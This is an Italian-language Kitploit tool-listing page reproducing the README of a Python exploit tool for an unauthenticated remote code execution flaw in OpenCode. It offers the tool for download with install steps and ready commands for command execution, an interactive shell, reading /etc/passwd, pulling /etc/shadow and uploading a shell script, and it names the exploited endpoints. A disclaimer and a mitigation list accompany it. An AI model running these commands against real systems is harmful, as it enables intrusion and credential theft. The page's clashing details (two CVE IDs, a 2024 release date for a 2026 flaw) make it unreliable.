Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-22812 — Strumento di exploit in Python per OpenCode RCE (CVE-2026-22812) che fornisce esecuzione di comandi, lettura/scrittura/caricamento/scaricamento di file e shell interattiva per test di penetrazione autorizzati. | Kitploit
Strumenti/GitHubGitHub/0xgh057r3c0n/cve-2026-22812
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlStrumento di Accesso Remoto
GitHub0xgh057r3c0n/cve-2026-22812

CVE-2026-22812

Strumento di exploit in Python per OpenCode RCE (CVE-2026-22812) che fornisce esecuzione di comandi, lettura/scrittura/caricamento/scaricamento di file e shell interattiva per test di penetrazione autorizzati.

Vedi Repository
217 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-22812

Panoramica

Uno strumento di sfruttamento in Python per la vulnerabilità di Remote Code Execution (RCE) di OpenCode che interessa le versioni < v1.0.216. Questo strumento fornisce molteplici vettori di attacco, tra cui esecuzione di comandi, lettura/scrittura di file, caricamento/scaricamento di file e shell interattiva.

Disclaimer

⚠️ SOLO PER TEST AUTORIZZATI ⚠️

  • Questo strumento è destinato esclusivamente a test di sicurezza legittimi e test di penetrazione autorizzati
  • Utilizzalo solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione a testare
  • L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento
  • L'accesso non autorizzato a sistemi informatici è illegale e punibile per legge

Funzionalità

  • Rilevamento Vulnerabilità: Verifica se il target è vulnerabile
  • Esecuzione Comandi: Esegue comandi arbitrari sul target
  • Operazioni sui File: Legge, scrive, carica e scarica file
  • Shell Interattiva: Shell interattiva completa con completamento tramite tab
  • Ricognizione di Sistema: Raccoglie informazioni sul sistema
  • Supporto Proxy: Instrada il traffico attraverso un proxy HTTP
  • Tracciamento Statistiche: Monitora le attività di sfruttamento

Installazione

root@kitploit:~
# Clona il repository
git clone https://github.com/0xgh057r3c0n/CVE-2026-22812.git
cd CVE-2026-22812

# Installa le dipendenze
pip install requests urllib3

# Rendi eseguibile (opzionale)
chmod +x CVE-2026-22812.py

Requisiti

  • Python 3.6+
  • Libreria requests
  • Libreria urllib3

Utilizzo

root@kitploit:~
python3 CVE-2026-22812.py -t http://target:port [options]

Esempi Base

root@kitploit:~
# Verifica se il target è vulnerabile
python3 exploit.py -t http://10.0.0.1:4096 --check

# Shell interattiva
python3 exploit.py -t http://10.0.0.1:4096 -i

# Esegui un singolo comando
python3 exploit.py -t http://10.0.0.1:4096 -c "id"

# Leggi un file
python3 exploit.py -t http://10.0.0.1:4096 -r /etc/passwd

# Carica un file
python3 exploit.py -t http://10.0.0.1:4096 --upload shell.sh /tmp/shell.sh

# Scarica un file
python3 exploit.py -t http://10.0.0.1:4096 --download /etc/shadow shadow.txt

# Ottieni informazioni sul sistema
python3 exploit.py -t http://10.0.0.1:4096 --info

# Usa un proxy (Burp Suite, ecc.)
python3 exploit.py -t http://10.0.0.1:4096 -c "whoami" --proxy http://127.0.0.1:8080

Comandi della Shell Interattiva

Una volta nella shell interattiva (flag -i), puoi utilizzare:

root@kitploit:~
<comando>                   Esegui comando shell
help                       Mostra menu di aiuto
exit                       Esci dalla shell
session                    Mostra ID sessione
stats                      Mostra statistiche di sfruttamento
read <file>                Leggi contenuto file
download <remoto> <locale>  Scarica file
upload <locale> <remoto>    Carica file
sysinfo                    Ottieni informazioni sul sistema

Dettagli della Vulnerabilità

  • ID CVE: CVE-2026-22812 / CVE-2026-22182
  • Prodotto: OpenCode
  • Versioni Affette: < v1.0.216
  • Tipo di Vulnerabilità: Remote Code Execution
  • Vettore di Attacco: Rete
  • Autenticazione: Non richiesta

Dettagli Tecnici

La vulnerabilità esiste nell'endpoint di gestione delle sessioni (/session) che consente a utenti non autenticati di creare sessioni ed eseguire comandi arbitrari tramite l'endpoint /session/{id}/shell.

Endpoint Sfruttati:

  1. POST /session - Crea sessione
  2. POST /session/{id}/shell - Esegue comandi
  3. GET /file/content - Legge file

Mitigazione

  1. Aggiorna OpenCode alla versione ≥ v1.0.216
  2. Implementa autenticazione e autorizzazione adeguate
  3. Limita l'accesso di rete alle istanze OpenCode
  4. Implementa validazione e sanificazione degli input
  5. Utilizza un Web Application Firewall (WAF)

Struttura del Codice

root@kitploit:~
CVE-2026-22812.py
├── Classe Colors (codici colore ANSI)
├── print_banner() (Mostra banner)
├── Classe Exploit (Logica principale dello sfruttamento)
│   ├── __init__() (Inizializzazione)
│   ├── check_vuln() (Verifica vulnerabilità)
│   ├── create_session() (Crea sessione)
│   ├── exec_cmd() (Esegui comando)
│   ├── read_file() (Leggi file)
│   ├── write_file() (Scrivi file)
│   ├── upload() (Carica file)
│   ├── download() (Scarica file)
│   ├── get_info() (Info sistema)
│   ├── shell() (Shell interattiva)
│   └── Metodi helper
└── main() (Parsing argomenti)

Licenza

Questo strumento è rilasciato esclusivamente a scopo educativo. Utilizzalo a tuo rischio.

Autore

  • GitHub: 0xgh057r3c0n
  • Strumento: Strumento di Sfruttamento CVE-2026-22812

Contributi

  1. Fai un fork del repository
  2. Crea un branch per la funzionalità
  3. Committa le tue modifiche
  4. Pusha sul branch
  5. Crea una Pull Request

Riconoscimenti

  • Ricercatori di sicurezza che hanno scoperto la vulnerabilità
  • Comunità open source
  • Tutti i contributori e tester

Riferimenti

  • Advisory di Sicurezza OpenCode
  • Database CVE
  • Voce NVD

Supporto

Per problemi e domande, ti preghiamo di:

  1. Controllare le issue GitHub esistenti
  2. Creare una nuova issue con una descrizione dettagliata
  3. Includere l'URL del target (se possibile) e i messaggi di errore

Cronologia Versioni

  • v1.0.0 (2024-01-20): Rilascio iniziale
    • Rilevamento vulnerabilità
    • Esecuzione comandi
    • Operazioni sui file
    • Shell interattiva
    • Supporto proxy
Scarica lo strumento